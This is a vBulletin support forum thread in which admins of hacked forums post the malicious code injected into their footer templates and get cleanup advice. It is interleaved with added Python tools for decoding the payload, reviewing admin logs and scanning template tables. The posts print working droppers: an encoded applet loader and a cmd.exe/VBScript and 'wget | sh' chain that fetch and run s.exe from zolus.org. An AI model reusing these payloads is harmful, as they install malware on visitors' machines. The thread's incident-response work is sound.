Vbulletin Virus URGENT HELP

  • ZeroHour
    replied
    Originally posted by Tailfeathers View Post
    Same thing happened to me, my FTP client says that a few files were uploaded at 1909 on the 20th. This was the code in the footer:

    Was your MySQL password the same as your FTP one?
    What permissions were set on the dir they uploaded to?



  • Tailfeathers
    replied
    Same thing happened to me, my FTP client says that a few files were uploaded at 1909 on the 20th. This was the code in the footer:

    Code:
    <script type='text/javascript' language='Javascript'>document.write(unescape('%3c%61%70%70%6c%65%74%20%77%69%64%74%68%3d%27%31%27%20%68%65%69%67%68%74%3d%27%31%27%20%63%6f%64%65%3d%27%4a%61%76%61%2e%63%6c%61%73%73%27%20%61%72%63%68%69%76%65%3d%27%4a%61%76%61%2e%6a%61%72%27%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%75%72%6c%27%20%76%61%6c%75%65%3d%27%68%74%74%70%3a%2f%2f%7a%6f%6c%75%73%2e%6f%72%67%2f%73%2e%65%78%65%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%6c%6f%63%61%74%69%6f%6e%27%20%76%61%6c%75%65%3d%27%25%41%50%50%44%41%54%41%25%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%66%69%6c%65%27%20%76%61%6c%75%65%3d%27%73%2e%65%78%65%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%72%27%20%76%61%6c%75%65%20%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%27%20%2f%3e%3c%2f%61%70%70%6c%65%74%3e'));</script>
    It leads to some sort of script at zolus.org

    I've changed my forum password and am now asking my host to change my FTP password, as that's the only way I can think of that they'd be able to upload files to the server. I'm running 4.0.6 patch level 1, time to upgrade I guess...


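Decoding the injected footer script above, as an added example that is not part of the thread or any poster's code: a single-pass equivalent of JavaScript's legacy unescape() plus an applet parameter extractor, so the archive and the url/location/file params of the hidden applet can be read without running it. The embedded snippet is the one Tailfeathers posted; js_unescape, AppletParser and triage are names chosen here.

```python
import re
from html.parser import HTMLParser

# The injected footer line exactly as posted in the thread above (input for triage, not executed).
INJECTED = "<script type='text/javascript' language='Javascript'>document.write(unescape('%3c%61%70%70%6c%65%74%20%77%69%64%74%68%3d%27%31%27%20%68%65%69%67%68%74%3d%27%31%27%20%63%6f%64%65%3d%27%4a%61%76%61%2e%63%6c%61%73%73%27%20%61%72%63%68%69%76%65%3d%27%4a%61%76%61%2e%6a%61%72%27%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%75%72%6c%27%20%76%61%6c%75%65%3d%27%68%74%74%70%3a%2f%2f%7a%6f%6c%75%73%2e%6f%72%67%2f%73%2e%65%78%65%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%6c%6f%63%61%74%69%6f%6e%27%20%76%61%6c%75%65%3d%27%25%41%50%50%44%41%54%41%25%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%66%69%6c%65%27%20%76%61%6c%75%65%3d%27%73%2e%65%78%65%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%72%27%20%76%61%6c%75%65%20%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%27%20%2f%3e%3c%2f%61%70%70%6c%65%74%3e'));</script>"

def js_unescape(s):
    """Single-pass equivalent of JavaScript's legacy unescape(): decodes %XX and %uXXXX.
    One pass only: a decoded '%25' becomes a literal '%' and is NOT decoded again,
    which is how this payload emits the Windows %APPDATA% variable intact."""
    return re.sub(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})',
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def decode_unescape_calls(page_source):
    """Plaintext of every unescape('...') argument found in the page source."""
    return [js_unescape(arg) for arg in re.findall(r"unescape\('([^']*)'\)", page_source)]

class AppletParser(HTMLParser):
    """Collects <applet> tags and their <param> name/value pairs from decoded HTML."""
    def __init__(self):
        super().__init__()
        self.applets = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == 'applet':
            self.applets.append({'code': a.get('code'), 'archive': a.get('archive'), 'params': {}})
        elif tag == 'param' and self.applets:
            self.applets[-1]['params'][a.get('name')] = a.get('value')

def triage(page_source):
    """Decode every unescape() payload in the source and list the applets it would
    document.write(), with the jar they load and the parameters they are handed."""
    parser = AppletParser()
    for decoded in decode_unescape_calls(page_source):
        parser.feed(decoded)
    return parser.applets

if __name__ == '__main__':
    for applet in triage(INJECTED):
        print('applet', applet['code'], 'loaded from', applet['archive'])
        for name, value in applet['params'].items():
            print('  param', name, '=', value)
```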

  • PondPikey
    replied
    Will do ZH. Again, much appreciated.



  • ZeroHour
    replied
    Originally posted by PondPikey View Post
    A cheer for ZeroHour!

    Found the damn thing in the footer template. Removed, looking good! I've upgraded and still unsure how that would be done.

    Really appreciated, pop in sometime, I do a great cup of tea!


    Find your Apache logs and take a look through them for those accessing admincp/ etc. other than your IP (www.whatismyip.com) to see if you can find the issue. Were you running 4.0.8 PL3?
    The logs will be key as there are rumours of a possible exploit in other versions but it's all unconfirmed right now.
    The best thing you can do is zip up your HTTP logs, error logs and admincp logs and send your story to vBulletin via the members area and give as best a timeline as possible to help them see if they spot anything. Also a mods list would be good as some mods had major holes (paste that here as well ideally).


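The log review ZeroHour describes, as an added example that is not part of the thread or any poster's code: parse Apache combined-format lines, list admincp/ and modcp/ requests from any address other than the owner's own IP, and separately list every POST to the template editor since the injection was a template change. The log lines are constructed samples; the /admincp/template.php?do=updatetemplate path is an assumed name for the template editor, and review_admin_access and template_edits are names chosen here.

```python
import re
from collections import defaultdict

# Constructed sample in Apache "combined" log format (not real logs from the thread).
# 203.0.113.10 plays the site owner; the template.php path/action is an assumption.
SAMPLE_LOG = """\
203.0.113.10 - - [20/Jun/2011:19:02:11 +0100] "GET /admincp/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [20/Jun/2011:19:03:45 +0100] "POST /admincp/template.php?do=updatetemplate HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Jun/2011:19:05:02 +0100] "GET /forum.php HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Jun/2011:19:06:30 +0100] "GET /admincp/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [20/Jun/2011:19:09:17 +0100] "POST /admincp/template.php?do=updatetemplate HTTP/1.1" 200 812 "-" "python-urllib/2.6"
192.0.2.44 - - [20/Jun/2011:19:09:40 +0100] "GET /search.php?do=getdaily&contenttype=vBForum_Post HTTP/1.1" 200 33000 "-" "python-urllib/2.6"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Areas of the forum only the site owner should be reaching.
SENSITIVE_PREFIXES = ('/admincp/', '/modcp/')

def parse_line(line):
    """One combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def review_admin_access(log_text, own_ips):
    """{ip: [(time, method, path, user-agent), ...]} for requests into admincp/ or modcp/
    from any address not in own_ips (the admin's own IP, per www.whatismyip.com)."""
    hits = defaultdict(list)
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        if rec['path'].startswith(SENSITIVE_PREFIXES) and rec['ip'] not in own_ips:
            hits[rec['ip']].append((rec['time'], rec['method'], rec['path'], rec['ua']))
    return dict(hits)

def template_edits(log_text):
    """Every POST to the template editor, whoever sent it: the injected footer was a
    template change, so this is the 'who edited templates, and when' shortlist."""
    return [(r['ip'], r['time']) for r in filter(None, map(parse_line, log_text.splitlines()))
            if r['method'] == 'POST' and r['path'].startswith('/admincp/template.php')]

if __name__ == '__main__':
    for ip, reqs in review_admin_access(SAMPLE_LOG, {'203.0.113.10'}).items():
        print(ip, reqs)
    print(template_edits(SAMPLE_LOG))
```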

  • PondPikey
    replied
    A cheer for ZeroHour!

    Found the damn thing in the footer template. Removed, looking good! I've upgraded and still unsure how that would be done.

    Really appreciated, pop in sometime, I do a great cup of tea!



  • ZeroHour
    replied
    Found something:
    Code:
    <div id="box"> 
    <applet width='1' height='1' code='Client.class' archive='http://zolus.org/Client.jar'> 
    <param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs  http://zolus.org/s.exe %temp%\update.exe'> 
    <param name='windows2' value=''> 
     
    <param name='unix1' value=""> 
    <param name='unix2' value=""> 
     
    <param name='linux1' value="wget  http://zolus.org/s.exe -O- | sh"> 
    <param name='linux2' value=""> 
     
    </applet> 
    </div>
    hxxp://www.carpy.co.uk/search.php?do=getdaily&contenttype=vBForum_Post but I think the default skin just changed?
    I think that skin has the problem. Java malware.

    I have reported the jar host to google for malware blocking (not your site)



  • PondPikey
    replied
    OK, try now: version 4.1.4, uploaded new files and still having the issue.



  • setishock
    replied
    I get this error in FF:
    Content Encoding Error
    The page you are trying to view cannot be shown because it uses an invalid or unsupported form of compression.
    Please contact the website owners to inform them of this problem.



  • PondPikey
    replied
    Yup, same error on IE and Chrome. Sophos reports it as a skiddie!



  • ZeroHour
    replied
    Can't see anything initially. What AV is telling you there is a virus, and what browser? Does it happen in other browsers?
    Short of seeing the site turned on with my dev tools I can't see the page problem.



  • PondPikey
    replied
    Thanks ZeroHour, take a looksie... I can't see anything blatant.

    Thanks in advance

    htmlOuput.txt



  • ZeroHour
    replied
    Could you view the html source in your browser and save the source to .txt and attach it?
    NOTE: not the php source or anything inside admincp templates, the source of the page which comes up with that error (just to be clear)



  • PondPikey
    replied
    [Attached screenshot: avg.JPG]

    See attached screenshot.

    Just taken a database backup. What should I be searching for in phpMyAdmin?!

    Hope you can help!



  • borbole
    replied
    Originally posted by PondPikey View Post
    Nope, but as soon as you log on it gets crazy!
    How exactly does it go crazy? Can you post a screenshot?

    Check the db for the malicious iframe code, more specifically the templates table. Ask your host as well to check their logs and see how they got access to your forum. After you clean up your forum, change all your login info and then upgrade it to 4.1.4 a.s.a.p.


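The templates-table check borbole recommends (and the "what should I search for in phpMyAdmin" question above), as an added example that is not part of the thread or any poster's code: scan every row of the template table for markers that do not belong in a normal vBulletin template (applet, iframe, unescape, remote jar archive) and report which style and template they sit in. The `template` table and its templateid/styleid/title/template columns are assumptions about the vBulletin schema; the rows are constructed demo data with attacker.invalid as a placeholder host, and scan_templates and demo_db are names chosen here.

```python
import re
import sqlite3

# Markers that have no business in a normal vBulletin template. Constructed from the
# injections shown in this thread; extend as needed.
SUSPICIOUS = [
    re.compile(r'<applet\b', re.I),
    re.compile(r'<iframe\b', re.I),
    re.compile(r'unescape\s*\(', re.I),
    re.compile(r'String\.fromCharCode', re.I),
    re.compile(r'archive=[\'"]https?://', re.I),   # applet jar pulled from another host
]

# Rough phpMyAdmin equivalent of scan_templates() (LIKE cannot do word boundaries):
#   SELECT templateid, styleid, title FROM template
#   WHERE template LIKE '%<applet%' OR template LIKE '%<iframe%' OR template LIKE '%unescape(%';

def scan_templates(conn):
    """[(templateid, styleid, title, [matched patterns])] for every row of the template
    table whose body matches a suspicious marker. Column names are an assumption."""
    findings = []
    rows = conn.execute("SELECT templateid, styleid, title, template FROM template ORDER BY templateid")
    for tid, sid, title, body in rows:
        hits = [p.pattern for p in SUSPICIOUS if p.search(body or '')]
        if hits:
            findings.append((tid, sid, title, hits))
    return findings

def demo_db():
    """Constructed in-memory stand-in for the forum database (not real forum data)."""
    conn = sqlite3.connect(':memory:')
    conn.execute("CREATE TABLE template (templateid INTEGER, styleid INTEGER, title TEXT, template TEXT)")
    conn.executemany("INSERT INTO template VALUES (?, ?, ?, ?)", [
        (1, 1, 'header', '<div id="header">{vb:raw vboptions.bbtitle}</div>'),
        (2, 1, 'footer', '<div id="footer">...</div>\n<div id="box"><applet width=\'1\' height=\'1\' '
                         'code=\'Client.class\' archive=\'http://attacker.invalid/Client.jar\'></applet></div>'),
        (3, 2, 'footer', '<div id="footer">...</div>'),
        (4, 2, 'headinclude', "<script>document.write(unescape('%3c%61'));</script>"),
    ])
    conn.commit()
    return conn

if __name__ == '__main__':
    for tid, sid, title, hits in scan_templates(demo_db()):
        print(f'template {tid} "{title}" in style {sid}: {hits}')
```

Run the same scan against a MySQL dump of your forum by pointing a connection at it; the offending templates are then edited back in admincp, which also reveals which style was touched.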

  • PondPikey
    replied
    Originally posted by Trevor Hannant View Post
    I don't see anything untoward in the source code for the 'board closed' page
    Nope, but as soon as you log on it gets crazy!

